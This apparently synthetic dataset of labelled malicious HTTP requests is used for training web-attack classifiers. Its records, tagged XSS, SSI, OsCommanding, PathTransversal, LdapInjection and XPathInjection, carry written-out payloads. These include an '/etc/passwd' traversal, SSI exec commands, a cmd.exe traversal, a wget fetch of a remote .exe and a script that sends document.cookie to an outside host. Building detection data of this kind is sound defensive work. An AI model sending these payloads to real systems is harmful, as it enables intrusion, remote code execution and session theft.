Cookie: gh=579;chryo0xeeqo=otdivdT6le1~n si;eiitigdlOh=Yelaqon;document8QfhAnp0Hlcat=Rzseak+aEsrtc8r;aen=5450;Etnkanaoqt=iatY4s
Cookie2: $Version="885"
Date: Tue, 27 May 08 22:47:57 GMT
ETag: "DiWsWZsCWsn9Y0BlI_"
Expect: 100-continue
From: u3u4saNf@h5ldevB.be
If-Modified-Since: Sun, 25 Jan 04 22:15:29 GMT
If-Unmodified-Since: Wed, 18 Jun 08 04:46:57 CET
If-Match: "YrTK_IhAwjNM-PDjj"
If-None-Match: "1Qk_y9xvJ2JPIw.gBjJr"
If-Range: "PFcwnWhCobeN-axw5x"
Max-Forwards: 8
MIME-Version: 8.0
Pragma: remiah2t=ninyos
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: NTLM bnVobk5vaGt1aWhlY2VlaXN0UzZ1ZWVhaDB6dGNhZWl0TTE5c2g1MjVzcnRscA==
Range: 336-,5495-71936
Referer: http://daa2p.org/z4a5nltd/oaCrtz/lkfp/gewmH/t6ax.swf
TE: deflate,trailers,chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: hMsMm1Ta.X http://www.rhsj6lh.de
UA-CPU: PowerPC
UA-Disp: 5073,578,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 006x6469
Via: c1n/4.0 www.tnSc9q.js
Transfer-Encoding: compress
Warning: 176 3.53.123.242 "nltteLtvtattssrC" 
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 8893219462168220047
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36454
Start - Id: 49184
class: XPathInjection
GET /aL/eQmBt-yyF56.gif?lehei=48&oonmtcssqtwunF=Apn&scriptOlH=an+wrThls&l45t=PgHborer&WxdAh=mian%27+++++or+7o%2Fyoawqn%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D9%5D+++++or++%279ee%27%3D%27&qitdtnhscia4bt0=9hiYcalhcnTsnO6Ep HTTP/1.0
Host: www.nZAaizuxe8.com
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-7;q=0.4, iso-8859-8
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 192.197.118.16
Cookie: iaiwienf=cngrilyr8bRmwSsir1;Mn4ey=si;bhttplnulleloe
Cookie2: $Version="33"
Date: Sat, 02 Jan 10 13:36:44 CET
ETag: "vrp1kGmnEHoBox1Rdwu"
Expect: 100-continue
From: ir0psea@aO25fruan.gov
If-Modified-Since: Mon, 31 Aug 09 03:45:58 GMT
If-Unmodified-Since: Mon, 27 Nov 06 21:44:35 GMT
If-Match: "Zsjb@xKUqr93hB47Uynt"
If-None-Match: *
If-Range: Fri, 16 Mar 07 14:00:25 UTC
Max-Forwards: 9639
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Basic bnRlbHdoZXc6bnRpZQ==
Authorization: Digest realm
Range: 87-,-69535,7135-70843
Referer: /hehe.sh
TE: trailers,gzip,gzip;q=0.6
Trailer: Connection
User-Agent: Mozilla/7.1 (X11; U; Unix 8.9; qP-oe; rv:9.1.7) Gecko/74806663
UA-CPU: x86
UA-Disp: 577,972,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 400x881
Via: 5.9 1.255.10.84
Transfer-Encoding: compress
Upgrade: q8iste/1.0, ici/0.5, qtyr3/1.9, oea/6.5, h1e5st/7.2
Warning: 858 www.efhrohf.jpg "oIntdrztcn98" 
X-Forwarded-For: 19.241.14.123
X-Serial-Number: 6850092
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49184
Start - Id: 46466
class: PathTransversal
POST /aiw/3sjaycvd/lfMKMYphZZzJ54vV/tn4eZHFYd1MVXs/aeweiasEoneir/8h/eggh/fNWI0QaD7UAZy-_/oihnYoTg03.5TTFhI/edsodv6aaca7emamor/e7B8nfkGZ@bvaiFyJC6/ayLvJI.html? HTTP/1.0
Content-Length: 272
Content-Language: th,3bt,aunasbt
Content-Encoding: compress
Content-Location: /ogiaeae/aneq/Aoft/Eiib.png
Content-MD5: aWlhZWx5cmtleWNlcm9OdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 02 Dec 05 07:23:45 UTC
Last-Modified: Thu, 04 May 06 02:41:12 GMT
Host: 223.192.40.150
Connection: close
Accept: */*
Accept-Charset: utf-7;q=0.1, us-ascii, euc-cn;q=0.2, windows-1250;q=0.7, x-mac-roman;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.0
Cookie: S8xoLlocteeh=9369;ageanewkBss6=e%;mJ0aI.ptCD=ppesCoohttps;mEtaozt=\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html;ec8yuPMnrd5nB=tl5oelt10re;etc7netz3nte=34
Date: Sun, 08 Feb 09 24:28:33 GMT
If-Unmodified-Since: Tue, 16 Mar 10 02:24:17 GMT
If-Match: *
If-None-Match: "E2f1ksT9bU9kc45n"
Max-Forwards: 2494
Referer: /zEwd/iropev/otdYosc/asaoatgi.shtml
TE: deflate;q=0.3
User-Agent: Mozilla/4.7 (Machintosh; U; Mac OS X 6.0; oO-is; rv:9.6.2) Gecko/04665124
X-Forwarded-For: 188.155.147.196

tmpn0Y1-2ibin=+sk?dlchilduetcjg&rpo1tosjdhu9=678678&mur=7116&HN.87h.QO=43556052&oea=aryks&l0bdg=2598756&Eiw=atmpmaa l$i&LyiltniYq=th71ha&8apb9rh=evsaeg3e8herirhCr&oej8d=l)<elsnas-zmYi&6xml0mtF=0aao&asbs8ptozwf=634&rs=846689452&fnwee=ael%Ro1 o&mh9niiostt8tuo=89

End - Id: 46466
Start - Id: 40515
class: SSI
GET /lEN6HLCa/vihhtaodssesp/uevs_ixGtTU/B9-Iky/rOEED_s9rP0YXkQIG/swUIyzOay/Dm0locationjbscriptVx/CyJ/iaIjw2A/Ri1pLzQW/r3WZwYW1@k7JWJBtWx/UTAk.nsf?onvgtmmur=+diivsr+&3cpositionlUSQQchildtX=%3C%21--++%23include++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+--%3E&hIdLCbatt5oN=sN0G2q2qj HTTP/1.0
Host: 29.220.103.41:80
Connection: close
Accept: image/*
Accept-Charset: *;q=0.8
Accept-Encoding: compress;q=0.1
Accept-Language: ebushn9c-cihid, EdmydVi-Sbijeipe;q=0.6, ozEe-sd;q=0.6, l-eeOn;q=0.2, ouDj-e;q=0.0
Cache-Control: max-age=09
Client-ip: 158.148.52.83
Cookie: oZb_n7=9080660817;thhfarsu7aa=538133;uuhtnoSqethtt7e=egncopyr;tgsT1Mey=arlQ;en461r1=500884445
Cookie2: $Version="046"
Date: Sun, 05 Dec 04 20:29:41 CET
ETag: W/"0HCHGnCBnWhjG4@"
Expect: 100-continue
From: ahew8h@v0rtaRr.ch
If-Modified-Since: Thu, 08 Oct 09 04:00:32 UTC
If-Unmodified-Since: Tue, 04 May 04 05:37:21 GMT
If-Match: "pVqsDZeXGRcdjc."
If-None-Match: *
If-Range: "vXl6oPc_Wpv1p4b"
Max-Forwards: 756
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: mmone heot=htan
Authorization: NTLM ZXR3MUVsdGhodEhnaWZzb3Rub0VhcmE2ZG9laWpEYWVlbWhlbnBtNGQwaWQ=
Range: 9539-,9338-,-3373
Referer: http://U3ngRhA.st/eatho/ahic3i/il0vi.zip
TE: trailers,gzip;q=0.5,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/1.0 (X11; U; SunOS sun4u 2.2; PM-ee; rv:5.4.1) Gecko/91688474
UA-CPU: StrongARM
UA-Disp: 591,998,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 278x2627
Via: 9.7 www.mnesdnjo.jpg, 1.7 www.iGwrg4dX.tiff
Transfer-Encoding: compress
Upgrade: erf2/5.5, agh/2.9, dtoitg/7.9
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 252.212.230.66
X-Serial-Number: 4796093744
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40515
Start - Id: 36165
class: PathTransversal
GET /@childJHBEA35ExXd/AhcoaAlp61lhnasBsyo0/hhsoEtoaseroweOnTau/l7shd/u7oDkvYKSqY.k0r/yzvgK/vO9E3IgqLZdbISD.jpg?zd=9951&vtehdaa=zstylepsbvaagiwindow.openrdocument+e%2B+-&lfgp=s5n&neez1O=8G7&KA6MWVl0=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fchal%2Fvestns%2Frail%2Froatlegend.sh&CHziframeshutdown5.@3K=no%3Dt&nl=e%3FE&rGdvD=nyupse HTTP/1.0
Host: 48.85.87.231
Connection: cteoNn
Accept: text/*, video/*
Accept-Charset: iso-8859-3, x-mac-chinesesimp;q=0.9
Accept-Encoding: deflate;q=0.4
Accept-Language: r9opgie-whinr;q=0.9, apoehe-3zyewb, xruz-ehs8iv, mlw7-emp7eht;q=0.8, 4e-jaep9
Cache-Control: min-fresh=5
Client-ip: 219.216.59.226
Cookie: wTetd=execs06s
Date: Thu, 04 Dec 08 02:32:14 GMT
ETag: W/"Ur6v1GbQqi5Fpv3B_GUc"
Expect: 100-continue
From: esie@ntoatbni.fr
If-Modified-Since: Fri, 13 May 05 19:19:39 CET
If-Unmodified-Since: Wed, 12 Jul 06 01:36:17 GMT
If-Match: *
If-None-Match: "GRW5p8B7ayXruK0NEE3"
If-Range: Tue, 13 Jul 04 08:37:32 UTC
Max-Forwards: 16
Pragma: teteoR7b='ieeRBnn'
Proxy-Authorization: Digest nonce
Authorization: Digest nc=b5e6dAC4
Range: 883-12,6163-,33622-
Referer: /oii1ptRv.html
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: ecKSbh@i http://www.tUbai.fr
UA-Disp: 4206,422,32
UA-Color: color32
UA-Pixels: 5546x388
Via: 7.8 27.46.195.168, 8.8 10.97.140.165, 1.0 127.166.226.111
Transfer-Encoding: identity
Upgrade: tIb8/7.2, obg2/2.9, sodta/1.6, qee/7.0, iemac/3.2
Warning: 176 103.233.4.139 "gothscr7a4n" 
X-Forwarded-For: 42.90.242.122
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36165
Start - Id: 45018
class: PathTransversal
PUT /5z0A3..1ILesAv/0naeseader1zmpor4l/fhngsghca.cgi? HTTP/1.1
Content-Length: 82
Content-Language: b
Content-Encoding: identity
Content-Location: http://www.beet.biz/0alvwon.php
Content-MD5: aDB1ZGR0c3NIbmFpaW5vbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Mar 06 16:17:14 CET
Last-Modified: Tue, 31 May 05 06:08:51 CET
Host: www.eyo776ru0l.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ./.././.././.././../
Cache-Control: tosel3=mdrhi
Cookie: 6y4jer=tI_;H3ale7hglQmti=ct0lltseI;e1Ren=e3e3BlfPcl1m
Cookie2: $Version="746"
Date: Wed, 26 Oct 05 19:57:46 UTC
ETag: "U_ur8zwGDcFU9al"
Expect: drto
If-Modified-Since: Fri, 13 Nov 09 01:29:02 CET
If-Match: *
If-Range: "xY9yxcI93ZGE-5ve0M"
Max-Forwards: 9596
Pragma: no-cache
Range: 1-,899478-
Referer: http://www.4o2soom.biz/yNtt/etcoeg.bin
TE: gzip
User-Agent: sedgQ2kCtc http://www.oelg.org
UA-Disp: 6080,526,32
UA-OS: FreeBSD
Via: HTTP/9.3 98.131.3.37, 8.7 www.rnceoe.png
Transfer-Encoding: identity
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aegj=access_log]iza&sediodrean=68885&hpity=uNmie&ito5itn=ltoe56Ean&OJmyb=j?9sw

End - Id: 45018
Start - Id: 43869
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .exe? HTTP/1.1
Host: www.ngtoah.com:712
Connection: close
Accept: */*
Accept-Charset: isiri-3342;q=0.2, windows-1258
Accept-Encoding: *
Accept-Language: etuoe-gt, p-a, cpbIta-kfeRi9, m6eanO-Sn6, dtt2-K;q=0.2
Cache-Control: no-cache
Client-ip: 132.134.82.134
Cookie: aooDNe8aehuod=deo;dOFB.bfyamail=3811990;enoLr1hte=e07a6j;Tsht=yhelf5hqdAe4etJhm;Nn=ee\stwqitmginhn
Cookie2: $Version="109"
Date: Thu, 14 Oct 04 06:54:07 UTC
ETag: "4p2ZiLBnvJxcMOdpmaxa"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Tue, 11 Oct 05 04:01:11 UTC
If-Unmodified-Since: Sun, 25 Sep 05 05:41:40 GMT
If-Match: "t-nu44CIJ9zpgSAjN0t"
If-None-Match: *
If-Range: "tV6pgn7jL-.aBsCU-4G5"
Max-Forwards: 57
MIME-Version: 1.9
Pragma: fAttmFml='s4a'
Proxy-Authorization: Digest uri=/uiers/ieatYM/iCiR.tiff
Authorization: lSOune xeikcnEt=6xsrh
Range: 91796-,027282-114595
Referer: /eazaee/mihno.js
TE: chunked;q=0.5,chunked,deflate;q=0.4
Trailer: User-Agent
User-Agent: vW04CqjX http://www.uamjs.biz
UA-CPU: Sparc
UA-Disp: 191,2261,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 629x1097
Via: FTP/7.1 www.dsOpFhe.jpg:988, FTP/1.3 www.fndeeYt.html, HTTP/6.4 222.118.147.81:4
Transfer-Encoding: 1qsm; vrjcoda9=adoeErc7
Upgrade: 0a7on5/8.8, emazee/1.9, 1hodgr/0.0, auiinp/3.7
Warning: 271 62.138.196.100 "8z8l8ou" "Tue, 21 Feb 06 05:57:12 CET"
X-Forwarded-For: 160.49.9.9
X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43869
Start - Id: 36611
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .exe? HTTP/1.0
Host: 8.108.56.220
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: euc-tw;q=0.0, macintosh
Accept-Encoding: 
Accept-Language: h8a5hao-lpDe, bh-Ph;q=0.1
Cache-Control: min-fresh=21873
Client-ip: 34.3.142.249
Cookie: optR@lTX6Bz=99020;4b2W7=~ylo<oyieto+t)n;Ze79e0okemis=3
Cookie2: $Version="9"
Date: Thu, 07 Apr 05 03:10:14 CET
ETag: "3FW1P6WeZ_tcD9N"
Expect: 100-continue
From: femsa@iitoSokm9u.de
If-Modified-Since: Thu, 20 Apr 06 20:29:19 UTC
If-Unmodified-Since: Thu, 24 Feb 05 21:32:24 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 21 Jul 07 02:16:37 CET
Max-Forwards: 93
MIME-Version: 1.9
Pragma: eytR=9
Proxy-Authorization: Basic RWViaWU6ZWh6c3JkYw==
Authorization: Basic MWJ0YjpzYWpsbw==
Range: 017729-
Referer: http://www.otes.uk/rionF.mpg
TE: trailers
Trailer: TE
User-Agent: jaEdDranOt/8.8.8
UA-CPU: MIPS
UA-Disp: 1925,168,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: HTTP/4.5 www.lu6s.css, 2.7 68.148.171.99, 5.2 138.124.168.243
Transfer-Encoding: compress
Upgrade: hr8so/4.0, h23/1.4, yud3rE/6.4, xdnou/0.4, bIe4Er/8.9
Warning: 933 www.oecji.html "M3c95ra8" "Thu, 10 Dec 09 13:28:45 UTC"
X-Forwarded-For: 112.185.117.2
X-Serial-Number: 0686987
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36611
Start - Id: 44070
class: OsCommanding
GET /scripts/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.ovpwo.st:80
Connection: eiynaiHq
Accept: */*
Accept-Charset: x-mac-greek, cp-950, isiri-3342, utf-8;q=0.9, iso-8859-15;q=0.4
Accept-Encoding: 
Accept-Language: risbtYg-qbtiargr, cnata-Rsie, V-1kiinctc;q=0.9
Cache-Control: max-stale
Client-ip: 103.148.81.42
Cookie: yroebaofl57s=r;access_log8Ktmpz8ELdA=]s A'6;e7iessel=8yye.yvjR36T;bU.mpga5=445662;8z=9e4e;h0zem8t4=td01
Cookie2: $Version="1"
Date: Tue, 17 Oct 06 14:23:40 GMT
ETag: W/"8jJSMp1FL9CwR-.L4"
Expect: 100-continue
From: eyde@enOee.biz
If-Modified-Since: Thu, 01 Dec 05 02:58:49 UTC
If-Unmodified-Since: Sat, 23 Jun 07 03:48:37 UTC
If-Match: *
If-None-Match: *
If-Range: "5JkRj29kWtlktZtkg"
Max-Forwards: 99
MIME-Version: 9.0
Pragma: g=e
Proxy-Authorization: NTLM dDF0aE5xMXl5dGV0bng5c2wycmFvdGlhYWF3cjZSbWtubXV0bQ==
Authorization: Digest nonce
Range: -6,-7
Referer: /jtfai9le.wmn
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/4.4 (compatible; Konqueror/0.0; Linux i386; ru1nhink; o24aTOfha)
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4959x090
Via: 8.6 www.cbtGUa.shtml
Transfer-Encoding: deflate
Upgrade: slvlT8/6.9
Warning: 539 167.196.18.192 "faE4bxsefpe4nbstnL" 
X-Forwarded-For: 180.219.181.140
X-Serial-Number: 388289600968011
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44070
Start - Id: 39908
class: SSI
POST /Ysxera/ifwf-g/isqrWsRueU6MZqovJuB/iaenTrps/uNoHKF6/zetytlvUi1/A01AtTHa/tfN07-y6Decl_ly9/mhfFo3mTy5G0.js? HTTP/1.1
Content-Length: 298
Content-Language: gobshle9
Content-Encoding: gzip
Content-Location: /neae/dcwfAto/boehou0/hguoswii/fk8rr.dll
Content-MD5: bElld3V0aGhhd3MwZ3BubA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 18 Jan 08 15:13:36 UTC
Last-Modified: Tue, 19 Jul 05 03:53:07 UTC
Host: www.nsst.fr
Connection: ano5iile
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: snijt-anb;q=0.1, aisles-eiuarsm;q=0.3, mtooy46-4et, 7cm0esud-ki, g-TlmNl;q=0.6
Cache-Control: no-cache
Client-ip: 239.36.31.16
Cookie: zrAs3iies8sith=owhered;3rieen3s=elat;smdfeFnmtweo=-copy;eumnrx=o6eaiposm Er| q ;6inzobject@1aGupdate2MP=42906155;s0ramT=417057426
Cookie2: $Version="47"
Date: Wed, 05 Aug 09 09:07:38 UTC
ETag: W/"a_Vo77J3mPTTCCUGOqjz"
Expect: cs2a2eya
From: etiwhOvt@03yWr.net
If-Modified-Since: Sun, 15 Jul 07 11:15:58 CET
If-Unmodified-Since: Sun, 12 Mar 06 06:26:43 UTC
If-Match: "vJjBK.Qx7jaij4qsS"
If-None-Match: *
If-Range: "Xedi0o0y5rPO_S_4"
Max-Forwards: 984
Pragma: eolsfe='o8Ed'
Proxy-Authorization: NTLM aW9lbWNlZW5zcWVvaWcwbHExbWd5NXNvaXFyZWN5bjRhaQ==
Authorization: Digest cnonce="DmWeetx"
Referer: http://www.N27mega.it/trareE/vtbeb/26ewf/atntlA4.php
TE: trailers,deflate;q=0.8,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/4.8 (Machintosh; U; PPC Mac OS X 3.1; x1-r1; rv:5.7.4) Gecko/17741492
Via: HTTP/5.2 187.102.95.128, FTP/3.1 40.117.75.66:60, FTP/3.2 172.234.64.50
Transfer-Encoding: gzip
Warning: 151 www.ttt8oAn.jpg "coIndbni" 
X-Serial-Number: 430786884231
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

anrotQ=[&ietnre6o= noy?&ayd=103756&E@1wp-vaZ=rdsC.NoO3c&ed7gemlneneedg=he&irll3m=netcatsr&hyoA7satuk=obdMrr&ALstdinFGfbunionb0=99235244&UtsehePr2=<!--     #exec    cmd="/bin/ls    -l  /home/savf/aosRrez2m"     -->&spassohihmhsS=nA&5rse=988&3swl65al47=e5nm&9EehE0dh=40782

End - Id: 39908
Start - Id: 37945
class: LdapInjection
GET /node1Q/he/xj/dNN8EvH/boMROiq/rTtlttdkth/2D/aXVJnEMMvdMm/cr001g/aPc4Sudaupew4i9u/a9vYaG7rhxESkfrz.swf?zejetir=8712759911&siIadtl=%29%28+%7C++%28displayName%3Dhad*%29%28name++++%3Dhad*++++%29%28++++mail%3Dhad*++%29 HTTP/1.1
Host: 199.142.252.127
Connection: close
Accept: */*;q=0.4
Accept-Charset: koi8
Accept-Encoding: *;q=0.5
Accept-Language: t-tn;q=0.1, eg-ynxl2, CiaSRzla-lcOxul3i;q=0.6, Uai-defNp
Cache-Control: max-stale
Client-ip: 123.126.49.207
Cookie: sexaxC7bt=dA Tc;hOetqew=174164
Cookie2: $Version="2"
Date: Fri, 14 Jul 06 17:21:29 CET
ETag: "aUGFuRHW-zMYOvq2nU"
Expect: 0ignSd=o0nsnoi
From: p2udarel@zentnnsmu.org
If-Modified-Since: Fri, 09 Dec 05 02:18:50 UTC
If-Unmodified-Since: Fri, 22 Feb 08 14:05:45 CET
If-Match: *
If-None-Match: "50JG9_b25xdD8wTN2U"
If-Range: "Rac18572haXkQj6nt-hB"
Max-Forwards: 902
MIME-Version: 3.4
Pragma: 6=dRt
Proxy-Authorization: tatlh xnoye=ys6aotch
Authorization: NTLM anRySWl0c2V4ZXJsOG5uZ2FpbTFvcm5icHRyM2djdHJzYWZoYWNLdDZocm8=
Range: 504-,69-,78804-
Referer: http://www.aaDswd.ch/hu4x/boxtefn.mp3
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/5.9 (Machintosh; U; PPC 7.4; ot-ns; rv:7.0.0) Gecko/07615868
UA-CPU: 68000
UA-Disp: 472,2226,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 8848x2681
Via: 6.8 www.eia6hEei.jpg, FTP/1.9 251.221.152.201, 7.3 169.244.76.129
Transfer-Encoding: deflate
Upgrade: spoM3/2.4, sus/6.4, cez/4.2
Warning: 209 www.aRtos.png "mgfiafudiih" 
X-Forwarded-For: 143.12.94.194
X-Serial-Number: 8812591
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37945
Start - Id: 43118
class: OsCommanding
GET /e8nPh-LkYEMgSTxgO/6s9elaNxtT1nseef5/2r4eneverq4dzem/sHkiPE.P3nEjw/bdcdaewleti2gzepb/tvVo@SEbtKggLO/nHG9/processing-instructionK@Qnobjectg.tiff?sro=8x3B8k.2-Lc&errSseko=eeAp&rl5eodd=628&etastuhth5AE=ytneelyaSeiiesoya&5Yfg=MoNosaalc&aTvmdwiecaa=m++ftpeval%25%29yaps%3Deenahue&dl4=%5Cn+++wget++http%3A%2F%2F130.57.43.59%3A6267%2Fnftp.exe&o4YtfhfeScpLi=rrlor2hcifa&_AYS6hOpvQI=936363992 HTTP/1.1
Host: 141.163.203.103
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-4
Accept-Encoding: deflate;q=0.9, deflate, identity;q=0.7, compress;q=0.7, gzip;q=0.2
Accept-Language: 5-Wtvla
Cache-Control: only-if-cached
Client-ip: 124.119.190.58
Cookie: kytrg=sa\$zE2tztg;Bnetcat1V_JeaFH=ae rargoktu5lsystemd>u;eathptoTor=5615656
Cookie2: $Version="389"
Date: Sat, 24 Apr 10 22:22:08 UTC
ETag: "C-hPZ3ueFN8_yN2Vv"
Expect: lsdemu=enrq;tlgMa=hYsee
From: 5aEtd@kfeetndtk6.de
If-Modified-Since: Thu, 04 Feb 10 19:34:00 UTC
If-Unmodified-Since: Tue, 08 Jul 08 20:51:15 GMT
If-Match: *
If-None-Match: "kdmInhjGX8@PH0Zx1S"
If-Range: Thu, 23 Jun 05 05:33:35 GMT
Max-Forwards: 182
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: NTLM U3RsZWhhcHRlVGE4bG9zYWVocnNYYWFhc3lsajd0ZVV0aDhsbm9ocmFpYQ==
Authorization: Digest cnonce="sodp"
Range: 94856-,22-022
Referer: http://wneiBnd.it/ipcaa.aspx
TE: deflate;q=0.4
Trailer: Host
User-Agent: Mozilla/9.4 (X11; U; Solaris 4.5; 3n-em; rv:5.9.1) Gecko/93097354
UA-CPU: StrongARM
UA-Disp: 046,4473,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 603x2268
Via: 9.7 www.adeE.tiff
Transfer-Encoding: identity
Upgrade: gst/8.6
Warning: 117 www.nI2s.jpeg "duaiiS2" 
X-Forwarded-For: 204.73.145.24
X-Serial-Number: 306986025864028
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43118
Start - Id: 48062
class: XSS
GET /nd5yMTUBV/dridxqIPMT8-FcKFdD@/eeh9T/6FTFJjae-gRH2pb/rqSqqm8Er5rf0t/a3d5TUpi_gWr/oHquCKk/salaofisiec/OexTp6sza1jruheuw/0IRjti0eIt/bb.css?pofikDetrmtazdH=38319372&ku5f=t%29eiaayxHan&kdqNe=6418696&ev=%3Cxml++++src+++%3D+++%22javascript%3A+++%5Balert++++%28%27ohv%27%29%3B%5D++++%22++++%3E&sdn=esnty2hR%3FdI&tideanaobnlinsm=9&endo=ahtpass%28Eencha+4rnhteor&rrju6pee=307338234&%uO75Gn=859950&br0niniiry5gre=7HYXu6iJqM&HeVsiGgoH=8387615&owdm=junionandl HTTP/1.0
Host: www.ywtneae.net
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.9, gzip, deflate;q=0.2
Accept-Language: *
Cache-Control: no-store
Client-ip: 43.162.196.251
Cookie: gt3iscccohs=81;s0a6fGMlF=nddHp;litod21eio9=heornonbhtr;weyloge3soSldab=fld;aioor=645929174;truoqnhliIipo=osai8z
Cookie2: $Version="9"
Date: Sun, 06 Dec 09 14:34:21 UTC
ETag: W/"@AY44BLRCYw-DcLtsp"
Expect: 100-continue
If-Modified-Since: Sat, 06 Jan 07 16:44:22 UTC
If-Unmodified-Since: Tue, 20 Sep 05 05:35:29 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 95
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Yean xazroh=heTobre
Authorization: sedh aaieeArs=mnoE
Referer: /ieiEO/ptkR.doc
Trailer: Warning
User-Agent: Mozilla/9.6 (Machintosh; U; PPC Mac OS X 7.2; ew-Rv; rv:8.0.8) Gecko/42820499
UA-CPU: PowerPC
UA-Disp: 934,0978,32
UA-Pixels: 8331x5573
Via: 6.8 237.69.248.1:3531, FTP/7.8 248.87.175.230, 7.2 www.eordra.html
Transfer-Encoding: gzip
Upgrade: edtthr/9.5, Yast/6.8, ti2epi/5.7, tgb0/4.2
Warning: 634 www.yauedif.css:99300 "eQn3Xdra5ghbItoas" 

null

End - Id: 48062
Start - Id: 47928
class: XSS
GET /jzAsMT_Z5ZxkOqhJoG/3gTEFqNK4h6@MJ/fMnodeuUV@/Aeunazu28e56ersnd/4fwotnAsM1niypr/sTeeerwx/eF5BCp0MV/wstedierRE5ie3o/OsdlsikgantVnghs.js?mrtmppdjRJO@DS=nsC&teOrya4=hP8Nn&eiszsemtlbsiZ=rlKXlncdiv9%3FtueU&et=38&dao=%40&oedlrf6u9dsr=eLBZ&sL=guNt&mahz=%3Cxml++++id+++%3D++%22X++%22+++%3E%3Ca++%3E%3Cb+++%3E%26lt%3Bscript%3E%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.esasen.com%2Fcgi-bin%2Fasor.cgi%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript++++%3E%3B%3C%2Fb+%3E%3C%2Fa+++%3E%3C%2Fxml++++%3E&fb8BkS=6.S_ HTTP/1.1
Host: www.aoet72oo.org
Connection: yarc
Accept: text/html;q=0.6, text/xml, text/html
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: eTto-etnit;q=0.8, oolte3-s;q=0.4, aRskw-t0ntcrge;q=0.4, iifife-l, atTiEl-eqjo;q=0.2
Cache-Control: max-stale=0
Client-ip: 123.204.156.42
Cookie: Hp5=c ;yitwdyl=4sgen;esc=46987
Cookie2: $Version="613"
Date: Wed, 01 Jul 09 20:13:22 UTC
ETag: W/"zaALvGTogQK3DnCL5"
Expect: on3be5=iadbe;seabhe=eetaKcek
From: T5cc@hrqtf.uk
If-Modified-Since: Thu, 28 Oct 04 09:11:01 UTC
If-Unmodified-Since: Tue, 27 Dec 05 09:22:12 GMT
If-Match: *
If-None-Match: "T9g_wsGtHyAHRhRw@z"
If-Range: Tue, 07 Aug 07 01:36:24 UTC
Max-Forwards: 0
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: xm5Eoo cesOKwc=keom4
Authorization: Basic c250RGlZaTozZXl1TWxs
Range: -6
